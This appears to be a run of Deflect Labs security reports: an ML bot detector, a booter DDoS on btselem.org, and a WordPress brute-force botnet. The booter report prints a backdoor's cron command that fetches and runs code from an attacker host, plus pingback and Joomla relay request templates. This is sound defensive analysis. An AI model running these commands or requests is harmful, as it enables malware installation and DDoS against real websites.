Given one request from one IP, not much can be said about whether or not that user is acting suspiciously, and thus how likely it is that they are a malicious bot, as opposed to a genuine user. If we instead group together all the requests to a website made by one IP over time, we can begin to build up a more complete picture of the user’s browsing behaviour. We can then train an anomaly detection algorithm to identify any IPs that are behaving outside the scope of normal traffic.
The boxplots below illustrate how the behaviour during the Vietnamese attack time periods differs from that seen during an average fortnight of requests to the same sites. To describe the browsing behaviour, 17 features (detailed in the Baskerville documentation) have been extracted based on the request sets (note that the feature values are scaled relative to average distributions, and do not have a physical interpretation). In particular, it can be seen that these attack time periods stand out by having far fewer unique paths requested (unique_path_to_request_ratio), a shorter average path depth (path_depth_average), a smaller variance in the depth of paths requested (path_depth_variance), and a lower payload size (payload_size_log_average). By the ‘path depth’, we mean the number of slashes in the requested URL (so ‘website.com’ has a path depth of zero, and ‘website.com/page1/page2’ has a path depth of two), and by ‘payload size’ we mean the size of the request response in bytes.
Figure 1: The distributions of the 17 scaled feature values during attack time periods (red) and non-attack time periods (blue). It can be seen that the feature distributions are notably different during the attack and non-attack periods.
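To make two of these features concrete, here is a toy computation of path depth and the log-average payload size (the real feature definitions live in the Baskerville documentation; this is only illustrative):

```python
# Toy versions of path_depth_average and payload_size_log_average.
import math

def path_depth(url_path: str) -> int:
    # '/' -> 0, '/page1/page2' -> 2
    return url_path.rstrip("/").count("/")

requests_in_set = [("/", 5120), ("/page1/page2", 14200)]  # (path, bytes)

depths = [path_depth(path) for path, _ in requests_in_set]
print(sum(depths) / len(depths))                # path_depth_average
print(sum(math.log(size) for _, size in requests_in_set)
      / len(requests_in_set))                   # payload_size_log_average
```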
The separation between the attack and non-attack request sets can be nicely visualised by projecting along the feature dimensions identified above. In the three-dimensional space defined by the average path depth, the average log of the payload size, and the unique path to request ratio, the request sets identified as malicious by Banjax (red) are clearly separated from those not identified as malicious (blue).
Figure 2: The distribution of request sets along three of the 17 feature dimensions for IPs identified as malicious (red) or benign (blue) by the existing banning module, Banjax. The features shown are the average path depth, the average log of the request payload size, and the ratio of unique paths to total requests, during each request set. The separation between the malicious (red) and benign (blue) IPs is evident along these dimensions.
Training a Model
A machine learning classifier enables us to more precisely define the differences between normal and abnormal behaviour, and to predict the probability that a new request set comes from a genuine user. For this report, we chose to train an Isolation Forest: an algorithm that performs well on novelty detection problems and scales to large datasets.
As an anomaly detection algorithm, the Isolation Forest took as training data all the traffic to the Vietnamese websites over a normal two-week period. To evaluate its performance, we created a testing dataset by partitioning out a selection of this data (assumed to represent benign traffic), and combining this with the set of all requests coming from IPs flagged by the Deflect platform's current banning tool, Banjax (assumed to represent malicious traffic). There are a number of tunable parameters in the Isolation Forest algorithm, such as the number of trees in the forest and the assumed contamination of the training data with anomalies. Using the testing data, we performed a grid search over these parameters to optimize the model's accuracy.
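A sketch of that search: train candidate models on the normal-traffic data, and keep the parameters that score best against the labelled test set. X_train, X_test and y_test are synthetic stand-ins here; in practice they come from the split described above.

```python
# Grid search over Isolation Forest parameters against a labelled test set.
from itertools import product
import numpy as np
from sklearn.ensemble import IsolationForest
from sklearn.metrics import f1_score

rng = np.random.default_rng(0)
X_train = rng.random((1000, 17))                 # "normal" traffic features
X_test = rng.random((200, 17))
y_test = np.where(rng.random(200) < 0.1, -1, 1)  # -1 malicious, +1 benign

best = None
for n_estimators, contamination in product([50, 100, 200], [0.005, 0.01, 0.05]):
    model = IsolationForest(n_estimators=n_estimators,
                            contamination=contamination,
                            random_state=42).fit(X_train)
    score = f1_score(y_test, model.predict(X_test), pos_label=-1)
    if best is None or score > best[0]:
        best = (score, n_estimators, contamination)

print(best)  # best f1 score and the parameters that produced it
```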
Replaying the Attacks
The model chosen for use in this report has a precision of 0.90, a recall of 0.86, and a resultant f1 score of 0.88, when evaluated on the testing dataset formulated from the Vietnamese website traffic, described above. If we take the Banjax bans as absolute truth (which is almost certainly not the case), this means that 90% of the IPs predicted as anomalous by Baskerville were also flagged by Banjax as malicious, and that 86% of all the IPs flagged by Banjax as malicious were also identified as anomalous by Baskerville, across the attacks considered in the Vietnamese report. This is demonstrated visually in the graph below, which shows the overlap between the Banjax flag and the Baskerville prediction (-1 indicates malicious, and +1 indicates benign). It can be seen that Baskerville identifies almost all of the IPs picked up by Banjax, and additionally flags a fraction of the IPs not banned by Banjax.
Figure 3: The overlap between the Banjax results (x-axis) and the Baskerville prediction results (colouring). Where the Banjax flag is -1 and the prediction colour is red, both Banjax and Baskerville agree that the request set is malicious. Where the Banjax flag is +1 and the prediction colour is blue, both modules agree that the request set is benign. The small slice of blue where the Banjax flag is -1, and the larger red slice where the Banjax flag is +1, indicate request sets about which the modules do not agree.
The performance of the model can be broken down across the different attack time periods. The grouped bar chart below compares the number of Banjax bans (red) to the number of Baskerville anomalies (green). In general, Baskerville identifies a much greater number of request sets as being malicious than Banjax does, with the exception of the 17th April attack, for which Banjax picked up slightly more IPs than Baskerville. The difference between the two mitigation systems is particularly pronounced on the 13th and 15th June attacks, for which Banjax scarcely identified any malicious IPs at all, but Baskerville identified a high proportion of malicious IPs.
Figure 4: The verdicts of Banjax (left columns) and Baskerville (right columns) across the 6 attack periods. The red/green components show the number of request sets that Banjax/Baskerville labelled as malicious, while the blue/purple components show the number that they labelled as benign. The fact that the green bars are almost everywhere higher than the red bars indicates that Baskerville picks up more traffic as malicious than does Banjax.
This analysis highlights the issue of model validation. It can be seen that Baskerville is picking up more request sets as being malicious than Banjax, but does this indicate that Baskerville is too sensitive to anomalous behaviour, or that Baskerville is outperforming Banjax? In order to say for sure, and properly evaluate Baskerville’s performance, a large testing set of labelled data is needed.
If we look at the mean feature values across the different attacks, it can be seen that the 13th and 15th June attacks (the red and blue dots, respectively, in the figure below) stand out from the normal traffic in that they have a much lower than normal average path depth (path_depth_average), and a much higher than normal 400-code response rate (response4xx_to_request_ratio), which may have contributed to Baskerville identifying a large proportion of their constituent request sets as malicious. Since a low average path depth (e.g. lots of requests made to ‘/’) and a high 400 response code rate (e.g. lots of requests to non-existent pages) are indicative of an IP behaving maliciously, this may suggest that Baskerville’s predictions were valid in these cases. But more labelled data is required for us to be certain about this evaluation.
Figure 5: Breakdown of the mean feature values during the two attack periods (red, blue) for which Baskerville identified a high proportion of malicious IPs, but Banjax did not. These are compared to the mean feature values during a normal two-week period (green).
Putting Baskerville into Action
Replaying the Vietnamese attacks demonstrates that it is possible for the Baskerville engine to identify cyber attacks on the Deflect platform in real time. While Banjax mitigates attacks using a set of static, human-written rules describing what abnormal traffic looks like, the Baskerville classifier, by comprehensively describing how normal traffic behaves, is able to identify new types of malicious behaviour that have never been seen before.
Although the performance of the Isolation Forest in identifying the Vietnamese attacks is promising, we would require a higher level of accuracy before the Baskerville engine is used to automatically ban IPs from accessing Deflect websites. The model’s accuracy can be improved by increasing the amount of data it is trained on, and by performing additional feature engineering and parameter tuning. However, to accurately assess its skill, we require a large set of labelled testing data, more complete than what is offered by Banjax logs. To this end, we propose to first deploy Baskerville in a developmental stage, during which IPs that are suspected to be malicious will be served a Captcha challenge rather than being absolutely banned. The results of these challenges can be added to the corpus of labelled data, providing feedback on Baskerville’s performance.
In addition to its applications for attack mitigation on the Deflect platform, Baskerville gives us a new way to visualise and analyse attacks after they occur, by grouping incoming logs into request sets by host and IP and extracting features from these request sets. We can compare attacks not just by the IPs involved, but also by the type of behaviour displayed. This opens up new possibilities for connecting disparate attacks, and investigating the agents behind them.
Where Next?
The proposed future of Deflect monitoring is the Deflect Labs Information Sharing and Analysis Centre (DL-ISAC). The underlying idea behind this project, summarised in the schematic below, is to split the Baskerville engine into separate User Module and Clearinghouse components (dealing with log processing and model development, respectively), to enable a complete separation of personal data from the centralised modelling. Users would process their own web logs locally, and send off feature vectors (devoid of IP and host site details) to receive a prediction. This allows threat-sharing without compromising personally identifiable information (PII). In addition, this separation would enable the adoption of the DL-ISAC by a much broader range of clients than the Deflect-hosted websites currently being served. Increasing the user base of this software will also increase the amount of browsing data we are able to collect, and thus the strength of the models we are able to train.
Baskerville is an open-source project, with its first release scheduled for next quarter. We hope this will represent the first step towards enabling a new era of crowd-sourced threat information sharing and mitigation, empowering internet users to keep their content online in an increasingly hostile web environment.
Figure 6: A schematic of the proposed structure of the DL-ISAC. The infrastructure is split into a log-processing user endpoint, and a central clearinghouse for prediction, analysis, and model development.
A Final Word: Bias in AI
In all applications of machine learning and AI, it is important to consider sources of algorithmic bias, and how marginalised users could be unintentionally discriminated against by the system. In the context of web traffic, we must take into account variations in browsing behaviour across different subgroups of valid, non-bot internet users, and ensure that Baskerville does not penalise underrepresented populations. For instance, checks should be put in place to prevent disadvantaged users with slower internet connections from being banned because their request behaviour differs from those users that benefit from high-speed internet. The Deflect Labs team is committed to prioritising these considerations in the future development of the DL-ISAC.
We identified a DDoS attack against the Israeli human rights website www.btselem.org on the 2nd of November 2018
Attackers used three different types of relays to overload the website and were automatically mitigated by Deflect
We identified the booter infrastructure (professional DDoS service) and accessed and analyzed its tools, which we describe in this article
In cooperation with Digital Ocean, Google and other security response teams, we have managed to shut down some of the booter’s infrastructure running on their platforms. The booter is still operational however and continues to create new machines to launch attacks.
Introduction
On the 2nd of November 2018, we identified a DDoS attack against the Deflect-protected website www.btselem.org. B'Tselem is an Israeli non-profit organisation striving to end Israel's occupation of the Palestinian territories. B'Tselem has been targeted by DDoS attacks many times in the past, including in 2013 and 2014, and again in 2016 while under Deflect protection. The organization has been facing pressure from the Israeli government for years, as well as from sectors of the Israeli public.
The attack on the 2nd of November was orchestrated from a booter infrastructure. A booter (also known as a DDoSer or stresser) is a DDoS-for-hire service, with prices starting as low as 15 dollars a month. Some services have supported a huge number of DDoS attacks, like the booter vDoS (taken down in August 2017 by the Israeli police), which carried out more than 150,000 DDoS attacks and earned more than $600,000 over two years of activity. The threat is now taken seriously by police in many countries, leading to the dismantling of several booter services.
This attack is one of seventeen that we identified targeting the B'Tselem website in 2018. Most of the web attacks used standard security audit tools such as Nikto, SQLMap or DirBuster, launched from different IPs in Israel. All the DDoS attacks we discovered used botnets to amplify the traffic load. The attack investigated in this report is the first example of a WordPress pingback attack against the btselem.org website in 2018.
In this article, we analyze the attack, including the tools and methods used by the booter.
Description of the Attack
On November 2nd, between midnight and 1am UTC, we identified an unusual peak of traffic to www.btselem.org. A large number of requests either had no user-agent string or used a user-agent indicating a WordPress pingback request (like WordPress/4.8.7; [REDACTED]; verifying pingback from 174.138.13.37). We confirmed that this traffic was part of a DDoS effort using different types of relays. We have documented pingback attacks several times in the past, and explain what they are in the 3rd Deflect Labs report.
btselem.org received 341,435 requests to / during that period, including 272,624 requests without a user-agent, 65,887 requests with the UA Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36, and 2,368 requests with various WordPress user-agents.
One interesting aspect of this traffic is that it targeted the domain btselem.org. This domain is configured to redirect to https://www.btselem.org with a 301 redirect HTTP code, but only a small part of the traffic actually followed the redirection and queried the final www website: we got 272,636 requests without a user-agent on btselem.org during the attack, and only 34,035 on www.btselem.org.
The idea is to abuse the WordPress pingback feature, which is built to notify a website when it is mentioned or linked to by another website. The source publication contacts the linked-to WordPress website with the URL of the source, and the linked-to website then replies to confirm receipt. By sending the initial pingback request with the target website as the source, it is possible to abuse this feature and use the WordPress website as a relay for a DDoS attack. To counter this threat, many hosting providers have disabled pingbacks altogether, and since version 3.9 WordPress adds the IP address at the origin of the request to the user-agent. An attack using the website www.example.com as a relay would show user-agents like WordPress/3.5.1; http://www.example.com before version 3.9, and WordPress/3.9.16; http://www.example.com; verifying pingback from ORIGIN_IP afterwards. Unfortunately, many WordPress websites are not updated and can still be used as relays without disclosing the source IP address.
By analyzing the WordPress user-agents seen during the attack, it is easy to map the websites used as relays:
2,368 requests came from WordPress websites
These requests came from 300 different WordPress websites used as relays
149 of these websites were running a version above 3.9
The user-agents of WordPress websites above version 3.9 show the IPs at the origin of the attack: WordPress/4.1.24; http://[REDACTED]; verifying pingback from 178.128.244.42.
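The extraction itself is a one-line regular expression over the logged user-agents (the relay URL below is a placeholder, as the real ones are redacted in this report):

```python
# Recover attack-origin IPs from WordPress >= 3.9 pingback user-agents.
import re

UA_RE = re.compile(r"WordPress/[\d.]+; \S+; verifying pingback from ([\d.]+)")

ua = "WordPress/4.1.24; http://relay.example.com; verifying pingback from 178.128.244.42"
match = UA_RE.search(ua)
if match:
    print(match.group(1))  # -> 178.128.244.42, one of the ten origin IPs
```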
We identified 10 IPs as the origin of these attacks, all hosted on Digital Ocean servers, which revealed the actual infrastructure of the booter. We describe below the infrastructure we identified and the actions we took to shut it down.
Analyzing other queries
The other part of the DDoS attack was a large number of requests to / without any query string, either without a user-agent (272,624 requests) or with the user-agent Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 (65,887 requests).
By analyzing samples of these IPs, we identified many of them as open proxies. For instance, we received 159 requests from the IP 213.200.56[.]86, listed as an open proxy in several open proxy databases. We checked the X-Forwarded-For header, which some proxies set to identify the origin IP making the request, and again found the same list of 10 Digital Ocean IPs at the source of the attack.
Finally, a small part of these requests remained from unknown sources until we discovered the Joomla relay list on the booter servers (see below). A common Joomla plugin called Google Maps has a vulnerability, disclosed in 2013, that allows using it as a relay. It has been used several times for DDoS attacks, especially around 2014. It is surprising to see such an old vulnerability still in use, but we identified only 2,678 requests, which shows that this attack is not very effective in 2018, likely due to the small number of websites still vulnerable.
Anatomy of a Booter
Infrastructure
As described earlier, the analysis of the WordPress pingback user-agents and of the X-Forwarded-For headers from proxies gave us the following list of IP addresses, all hosted on Digital Ocean:
178.128.244.42
178.128.244.184
178.128.242.66
178.128.249.196
142.93.136.67
188.166.26.137
188.166.43.4
188.166.105.145
174.138.13.37
188.166.125.216
These 10 servers were running an Apache HTTP server on port 80 with an open index file showing the list of tools used by the booter for DDoS attacks:
This open directory allowed us to download most of the tools and the lists of relays used by the booter.
Toolkit
We were able to download most of the tools used by the booter, with the exception of the PHP code files (the files executed when a URL is requested). Overall, we can see three types of files hosted on the booter:
Command files in PHP: api.php and sockhit.php
Tools: executables or JavaScript tools like https.js or joomla
Text files listing relays: joomla.txt, path.txt, perfect.txt, socks.txt and xmlrpc.txt
Unprotected Commands
We could not download the PHP files themselves (sockhit.php and api.php), but we could quickly deduce that they were used to remotely command the booter server from its interface in order to launch attacks.
One interesting thing to notice is that the sockhit.php file does not seem to require authentication, which means that the infrastructure could have been used by other people without the owners' knowledge. We think that these PHP files do not launch the attacks directly, but rather use the different tools deployed on the server to do so.
Backdoored Tools
The following tools were found on the server:
https.js a206a42857be4f30ea66ea17ce0dadbc
joomla 1956fc87a7217d34f5bcf25ac73e2d72a1cae84a
jsb.js b3a55eeb8f70351c14ba3b665d886c34
xmlrpc 480e528c9991e08800109fa6627c2227
We reversed both the xmlrpc and joomla files, and discovered that the joomla binary is actually backdoored. The file contains the real joomla executable from byte 0x2F29. Upon execution, the legitimate program is dumped into a temporary file (created with tmpnam), then a crontab entry is added by opening /etc/cron.hourly/0 and adding the line wget hxxp://r1p[.]pw/0 -O- 2>/dev/null| sh>dev/null 2>&1. The backdoor then opens itself and checks whether it already contains the string h3dNRL4dviIXqlSpCCaz0H5iyxM=; if not, it backdoors the file. Finally, it executes the legitimate program with the same arguments.
The final payload (5068eacfd7ac9aba6c234dce734d8901) takes as arguments (target) (list) (time) (threads), then reads the list file to get the list of Joomla websites and queries each of them over raw sockets with the following HTTP request:
HEAD /%s%s HTTP/1.1
Host: %s
User-agent: Mozilla/5.0
Connection: close
The xmlrpc binary (480e528c9991e08800109fa6627c2227) works in the same way (and is not backdoored): upon execution, the user has to provide a target website along with a list of WordPress websites in a file, a number of seconds for the attack and a number of threads ({target} {file} {seconds} {threads}). The tool then iterates over the list of WordPress websites in multiple threads for the given duration, making the following request to each website:
POST /%s HTTP/1.0
Host: %s
Content-type: text/xml
Content-length: %i
User-agent: Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)
Connection: close
<methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>
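Both sides of this pingback technique leave recognizable traces in web server logs. The following hedged sketch (ours, assuming the common Apache/nginx combined log format) flags incoming pingback.ping POSTs on a relay and the characteristic verifying-pingback user-agent on a victim:

```python
# Hedged sketch: spot pingback-relay activity in a combined-format
# access log. Relay side: POSTs to /xmlrpc.php. Victim side: requests
# with the "WordPress/x.y; ...; verifying pingback" user-agent.
import re
import sys

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

for line in open(sys.argv[1]):
    m = LOG_RE.match(line)
    if not m:
        continue
    if m["method"] == "POST" and m["path"].startswith("/xmlrpc.php"):
        print("relay? ", m["ip"], m["path"])
    elif m["ua"].startswith("WordPress/") and "verifying pingback" in m["ua"]:
        print("victim?", m["ip"], m["ua"])
```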
https.js and jsb.js are both JavaScript tools forked from the cloudscraper tool, which bypasses Cloudflare's anti-DDoS JavaScript challenge by solving the challenge server side. We don't really know how they are used by the booter.
The jsb.js file contains the following line, likely added to prevent attacks from this tool against the Turkish hacker forum DarbeTurk, but partially deleted since:
The following lists of relays were used on the server:
joomla.txt: 1226 Joomla websites with a Google Maps plugin vulnerable to relaying
path.txt: list of 2117 open proxies
perfect.txt: list of 1000 open proxies
socks.txt: list of 37849 open proxies
xmlrpc.txt: list of 9072 WordPress websites
As noted earlier, it is surprising to see 1226 Joomla websites with a vulnerable Google Maps plugin when this vulnerability was identified and fixed in 2014. We queried the 1226 URLs to check whether the PHP page was still available, and found that only 131 of them still exist today. This explains the small number of requests from this type of relay in the attack, and shows that the tools and lists used are quite outdated.
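This kind of liveness check takes only a few lines; a hedged sketch, assuming joomla.txt holds one relay URL per line:

```python
# Hedged sketch: count how many relay URLs from joomla.txt still answer.
import requests

urls = [u for u in open("joomla.txt").read().split() if u]
alive = 0
for url in urls:
    try:
        if requests.head(url, timeout=5).status_code < 400:
            alive += 1
    except requests.RequestException:
        pass  # dead host, DNS failure, timeout...
print(f"{alive} of {len(urls)} relays still reachable")
```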
Summary
This booter relies on three different DDoS methods, each using different relays:
WordPress pingback attacks
Joomla Google Maps plugin vulnerability
Open proxies
The attacks we have seen from this booter were not very effective and were automatically mitigated by Deflect. The backdoored joomla file and the jsb.js JavaScript tool (with its reference to a Turkish hacker forum) suggest a fairly amateur group reusing tools shared on hacker forums, and imply a low technical skill level.
Tracking the booter’s infrastructure
A few days after we downloaded the tools, we saw the index page of all the servers change to a very simple HTML file containing only 'kekkkk', and although the tools were still available, we could no longer see the list of files on the servers. As this string is a specific signature, we used Censys and BinaryEdge to track the creation of new servers by looking for IPs returning the same string.
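Once Censys or BinaryEdge returns candidate IPs, confirming them is straightforward; a minimal sketch (with placeholder IPs, not real indicators):

```python
# Minimal sketch: keep only the candidate IPs whose index page answers
# with the 'kekkkk' signature observed on the booter's servers.
import requests

candidates = ["203.0.113.10", "203.0.113.20"]  # placeholders

for ip in candidates:
    try:
        r = requests.get(f"http://{ip}/", timeout=5)
    except requests.RequestException:
        continue
    if "kekkkk" in r.text:
        print("booter server:", ip)
```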
Between mid-November and mid-December, we saw the booter using both Vultr and Google Cloud Platform. Overall, we identified 65 different IPs used by the operators, with a maximum of 17 in use at any one time.
We sent abuse requests to these companies. The two Google Cloud servers were taken down shortly after our email (we have no information on whether this was related to our abuse request). We contacted the Vultr abuse team several times, and they took down the booter infrastructure in mid-December. We sent an abuse request to Digital Ocean when we discovered the attack; several days later we managed to get in touch with their incident response team, which investigated this infrastructure further. After discussions with them, they took down the infrastructure in December, but the operator quickly started new Digital Ocean servers that are still up at the time of publication of this report.
Impact on Deflect protected websites
This DDoS attack was automatically mitigated by Deflect and did not create any negative impact on the targeted website.
Conclusion
The people operating this booter have been identified by the Digital Ocean security team. However, without an official complaint and a law enforcement request, the booter continues to operate, creating new infrastructure for launching attacks.
Booters have been around for a long time, and even though several groups have been taken down by police (like the infamous Webstresser.org), this attack shows that the threat is still real. The analysis of the tools presented here suggests that low skills are sufficient to run a booter service, simply by reusing tools published on different hacker forums. Even so, an attack of this amplitude would be enough to take down a small or medium-sized website without adequate DDoS protection.
We regularly hear about DDoS attacks coming from booters aimed at e-commerce websites or game platforms, but this incident is another reminder that civil society organizations are frequent victims of these same booters.
Indicators of Compromise
Original servers used by the booter (all Digital Ocean IPs):
178.128.244.42
178.128.244.184
178.128.242.66
178.128.249.196
142.93.136.67
188.166.26.137
188.166.43.4
188.166.105.145
174.138.13.37
188.166.125.216
MD5 hashes of the files available on the booter's servers:
a206a42857be4f30ea66ea17ce0dadbc https.js
cf554c82438ca713d880cad418e82d4f joomla
a21e6eaea1802b11e49fd6db7003dad0 joomla.txt
b3a55eeb8f70351c14ba3b665d886c34 jsb.js
9263a09767e1bad0152d8354c8252de9 path.txt
5214cbb3fc199cb3c0c439aedada0f2a perfect.txt
db8ee68a81836cde29c6d65a1d93a98d socks.txt
480e528c9991e08800109fa6627c2227 xmlrpc
ea2c3ee7ac340c25a9b9aa06c83d0b6e xmlrpc.txt
Acknowledgment
We would like to thank the different incident response teams that had to deal with our constant emails, as well as Censys, ipinfo.io and BinaryEdge for their tools.
We identified traffic from thousands of IPs trying to brute-force WordPress websites protected by Deflect, all using the same user-agent (Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0), since September 2017.
We confirmed that the botnet was not only targeting Deflect protected websites, but also a large number of websites across the Internet.
In this blog post, we analyze the origin IPs of this botnet, which mostly come from IP addresses located in China.
Introduction
In August 2018, we identified several attempts to brute-force WordPress websites protected by Deflect. These attacks all used the same user-agent, Firefox version 52 on Windows 7 (Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0). By retracing similar attacks with this user-agent, we discovered a large number of IP addresses involved in these attacks on more than a hundred Deflect protected websites since September 2017.
Presentation of an Attack
An example of an attack from this botnet can be found in the traffic we observed on a Deflect protected website on the 24th of May, with the user agent `Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0`:
At first, one IP, 125.65.109.XXX (AS38283 – CHINANET), enumerated the list of authors of the WordPress website:
Then 168 different IP addresses were used to brute-force the password through POST queries to /wp-login.php:
Targeting beyond Deflect Users
The botnet's large target list quickly made us think that it was not part of a political operation or a targeted attack, but rather an attempt to compromise any website available on the Internet. To confirm this hypothesis, we shared indicators of these attacks within threat intelligence groups, as well as with the GreyNoise platform, to see if honeypots were targeted too.
Shared Threat Intelligence
We shared indicators of the attacks with other members of an Information Sharing and Analysis Center (ISAC) we are part of. Two members confirmed having seen the same attacks on their professional and personal websites. One member agreed to share logs and IP addresses with us, which confirmed the same type of attack with the same user-agent.
Using GreyNoise data
We used both the open and enterprise access of the GreyNoise platform to gather more data about this botnet. GreyNoise is a threat intelligence platform that focuses on identifying online attack noise through a large network of honeypots, in order to differentiate targeted attacks from non-targeted ones. (We got access to the Enterprise platform after an eQualit.ie member contributed to the development of tools for GreyNoise.) GreyNoise works by gathering information on IPs that scan any of GreyNoise's honeypots, and tagging them based on the type of scan identified. We can quickly see in the GreyNoise visualizer that many IPs are identified as WORDPRESS_WORM:
We enumerated the IP addresses tagged as WORDPRESS_WORM, then queried detailed information for each IP in order to identify those using the Firefox 52 user-agent characteristic of this botnet. We identified 725 different IP addresses from this data set among the last 5000 WordPress scanners available through the Enterprise API.
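As an illustration of this filtering step, here is a hedged sketch against GreyNoise's current v2 context endpoint; the endpoint and the raw_data.web.useragents field are assumptions based on today's API, not the exact (Enterprise) calls we used at the time:

```python
# Hedged sketch: keep GreyNoise WORDPRESS_WORM IPs only if they were
# observed with the botnet's Firefox 52 user-agent.
import requests

API_KEY = "..."  # GreyNoise API key
BOTNET_UA = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"

def uses_botnet_ua(ip):
    r = requests.get(
        f"https://api.greynoise.io/v2/noise/context/{ip}",
        headers={"key": API_KEY},
        timeout=10,
    )
    r.raise_for_status()
    uas = r.json().get("raw_data", {}).get("web", {}).get("useragents", [])
    return BOTNET_UA in uas

scanners = ["198.51.100.7"]  # placeholder: IPs tagged WORDPRESS_WORM
print(sum(uses_botnet_ua(ip) for ip in scanners), "IPs match the botnet UA")
```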
These two pieces of information confirm that this botnet is targeting websites far beyond the websites we protect with Deflect.
Analysis of the traffic to Deflect
We identified the first query from this botnet to Deflect websites on the 27th of September 2017. We have graphed the number of requests made by this botnet to /wp-login.php over time:
Looking more closely at the distribution of requests per IP address, we see that a small number of IP addresses make a large share of the requests:
Analysis of the botnet
We identified 3148 unique IPs belonging to this botnet, from the following sources:
3011 targeting Deflect protected websites since September 2017
725 identified by GreyNoise as WORDPRESS_WORM
7 from logs shared by people from different communities
Checking the origin Autonomous Systems, we can see that 39% of the IPs come from AS4134 (Chinanet backbone) and AS4837 (China169):
342 ASN4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN
93 ASN9808 CMNET-GD Guangdong Mobile Communication Co.Ltd., CN
87 ASN18881 TELEFÔNICA BRASIL S.A, BR
86 ASN8452 TE-AS TE-AS, EG
82 ASN9498 BBIL-AP BHARTI Airtel Ltd., IN
50 ASN17974 TELKOMNET-AS2-AP PT Telekomunikasi Indonesia, ID
48 ASN3462 HINET Data Communication Business Group, TW
47 ASN4766 KIXS-AS-KR Korea Telecom, KR
40 ASN24445 CMNET-V4HENAN-AS-AP Henan Mobile Communications Co.,Ltd, CN
If we look at the origin countries of these IPs, we see that 53% of them are based in China:
1654 China
171 Brazil
168 India
102 Russia
94 Indonesia
87 Egypt
82 Republic of Korea
65 United States
62 Taiwan
43 Vietnam
We queried ipinfo.io to get the type of Autonomous System each of these IPs belongs to:
2743: Internet Service Providers
271: Business
132: Hosting
2: Unknown
Our findings show that the large majority of these systems come from networks providing Internet access to people through smartphones, computers or various Internet of Things devices.
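For readers who want to reproduce this classification, a hedged sketch of the lookup; the asn.type field ("isp", "business", "hosting") follows ipinfo.io's current paid API, and the field names here are assumptions:

```python
# Hedged sketch: tally the AS type of each bot IP via ipinfo.io.
from collections import Counter

import requests

TOKEN = "..."           # ipinfo.io API token
ips = ["198.51.100.7"]  # placeholder bot IPs

types = Counter()
for ip in ips:
    data = requests.get(f"https://ipinfo.io/{ip}?token={TOKEN}", timeout=10).json()
    types[data.get("asn", {}).get("type", "unknown")] += 1
print(types.most_common())
```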
To identify the operating system of these bots, we used another interesting feature of GreyNoise: the identification of the operating system at the origin of the requests through passive fingerprinting (using p0f signatures). By querying all the IPs from this botnet in GreyNoise and filtering on those using the Firefox 52 user agent, we checked which operating systems these IPs ran (1370 IPs from our list were identified in GreyNoise with the Firefox 52 user agent):
662 unknown
238 Linux 2.6
209 Linux 2.4.x
88 Linux 3.1-3.10
63 Linux 2.4-2.6
51 Linux 2.2-3.x
17 Linux 3.11+
12 Linux 2.2.x-3.x (Embedded)
9 Linux 3.x
8 Mac OS X 10.x
6 Windows 7/8
4 FreeBSD
1 Linux 2.0
1 Windows 2000
1 Windows XP
We see here that 50% of these IPs are identified as Linux systems, mostly with old Linux kernels (2.4 or 2.6). Our conclusion is that this botnet is mostly comprised of compromised routers, Internet of Things devices, or Android smartphones (Android uses the Linux kernel).
Another interesting fact shown by the GreyNoise data is that 2105 of these IPs were also flagged for other types of scans, mostly the following suspicious activities:
WEB_SCANNER_LOW: 1404
SSH_SCANNER_LOW: 1037
SSH_WORM_LOW: 950
WEB_CRAWLER: 705
TELNET_SCANNER_LOW: 117
TELNET_WORM_HIGH: 80
SSH_WORM_HIGH: 77
HTTP_ALT_SCANNER_LOW: 52
SMB_SCANNER_LOW: 44
SSH_SCANNER_HIGH: 33
We used this data to map the activity identified by GreyNoise over time, first for the WordPress brute-force traffic only, then for any suspicious activity:
We can see that either this botnet is not used only to attack WordPress, or many of these devices are compromised by more than one malware.
Impact on Deflect
We have not identified any impact from this botnet on Deflect protected websites. The first reason is that any heavy traffic going beyond the thresholds defined in our Banjax rules automatically gets the IP banned for some time; a large part of the traffic from this botnet was indeed blocked automatically by Deflect.
The second reason is that most websites using Deflect enable the Banjax admin page protection, which requires an extra shared password to access the administrative part of a website (for WordPress, /wp-admin/).
Protection Against Bruteforce
The WordPress documentation describes several ways to protect your website against such brute-force attacks. The first is to use a strong password, preferably a passphrase, that can resist the dictionary attacks used most of the time.
It is also possible to add an extra password (a bit like Banjax does) to the administration part of your website by using HTTP authentication; see the WordPress documentation for more information. (If you choose this option, it is recommended to install a tool preventing HTTP brute-force, like fail2ban.)
For professional WordPress hosting, a strong counter-measure against these attacks is to separate WordPress' live PHP code from the rendered WordPress pages by hosting the administration part of the website on a different domain (for instance using django-wordpress). We plan to implement this strategy on our own WordPress hosting in the coming months.
Conclusion
In this blog post, we have described a botnet targeting WordPress websites all around the world. The number of devices taking part in the attack is quite large (more than 3000), which shows that this is a well-organized operation. We have no information on the malware used to compromise these devices or on the objectives of this group. We are definitely interested in hearing from anyone with more information about this group, or with an interest in continuing this investigation. Please contact us at outreach AT equalit.ie.
Appendix
Acknowledgement
We would like to thank the members of the NGO ISAC, ipinfo.io and the Greynoise.io team for their support.
Indicators Of Compromise
You can look for the following indicators in your traffic:
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
url: POST /wp-login.php and GET /?author=1 (testing authors between 1 and 60)
We have no information on the post-compromise actions.
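A quick way to hunt for these indicators in your own logs, as a hedged sketch assuming the common combined log format:

```python
# Hedged sketch: extract candidate bot IPs from a combined-format
# access log using the indicators above.
import sys

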